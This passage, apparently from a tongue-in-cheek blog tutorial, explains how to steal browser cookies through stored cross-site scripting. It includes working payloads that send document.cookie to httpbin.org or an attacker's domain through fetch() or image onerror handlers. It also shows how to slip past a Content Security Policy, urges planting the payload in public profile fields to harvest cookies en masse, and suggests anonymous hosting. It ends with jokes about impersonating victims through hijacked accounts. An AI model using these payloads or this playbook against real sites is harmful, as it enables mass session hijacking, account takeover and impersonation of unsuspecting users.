If you’ve made it this far, things are going swimmingly. You’ve found a site that leaves transportable cookies exposed to JavaScript and will parse and execute text that you give it. Now all you need is to get those cookies from the unsuspecting visitor’s computer into your dorito-dust-covered fingers.

For this last step we need …

A site that does not have a CSP

A Content Security Policy is a real pain. It will block you from making requests to other domains from within the page. We can test this by pasting the following into the DevTools console:

fetch('//httpbin.org/post',{method:'POST',body:document.cookie})

You will see that on medium.com it gets blocked:

I’ve got a custom build of Chrome that plays sad-trombone on error.

Dammit.

You’ll see similar messages from twitter.com, facebook.com, although not from my bloody bank, as it turns out. There you will see something like this:

Waap waap waaaaaaaap.

This confirms that I was able to send cookies to an unknown domain (in this case, httpbin.org which is a nice little site that can just mirror back whatever you send to it).

I should say, just because a site doesn’t have a content security policy, it doesn’t make it insecure (one in ten users won’t have it anyway), but for our purposes we require a site with no CSP.

On a whim (I ❤ whims), I wondered if medium would let me request an image from (rather than post to) an unknown source. As it turns out it does. So in this case it’s easy enough to get around the CSP by just requesting an image and appending the cookies as params.

<img src=x onerror="this.src = '//httpbin.org/image/png?c=' + document.cookie">

As with previous examples, this image fails to load, then sets its own source, which is a real image so it doesn’t error again. The image is a pig.

You’ve been pigged.

Wrapping it all up

Alrighty vegimity, assuming that you have lined up the pieces of Swiss cheese, you have managed to find a site where you can enter some text, have it parsed by another user’s browser, access the poor sucker’s unprotected cookies, send them off to your own domain, and use those to sign in as that person, all without their knowledge.

Of course you’re not just getting one person’s cookies, you’re harvesting them en masse.

Now just find a text field that will be visible to the maximum number of other users of that site (e.g. the bio field on medium) and enter something like this:

<img src=x onerror="fetch('//yourdomain.com', {method: 'POST', body: document.cookie})">

If fetch() is blocked (this is covered by connect-src is the CSP), you can try the img URL approach (covered by the img-src directive in the CSP).

<img src=x onerror="this.src = '//httpbin.org/image/png?c=' + document.cookie">

The URL should of course point to your own domain. I believe Iceland is lovely this time of year and has some nice anonymous domain hosting options.

With great hacking comes great responsibility

If you do manage to get someone’s credentials to, say, a social network, please be responsible. Don’t just post photos of your rude parts; have a little class. Make innocuous posts late at night that are the sorts of things they would say; they will begin to think they’re sleep-sharing. Start writing up-beat yelp reviews for late-night venues in their local area so they think they’re sleep-socializing, too. Naturally you will post Photoshopped photos of them having a great time and sneak into their house and put a little stamp on their wrist from the club in question.

If you can get into an online shopping account, order them a book you think they might enjoy, or Ayn Rand. Perhaps splash out and get something nice for their significant other — flowers or bathroom scales, something like that.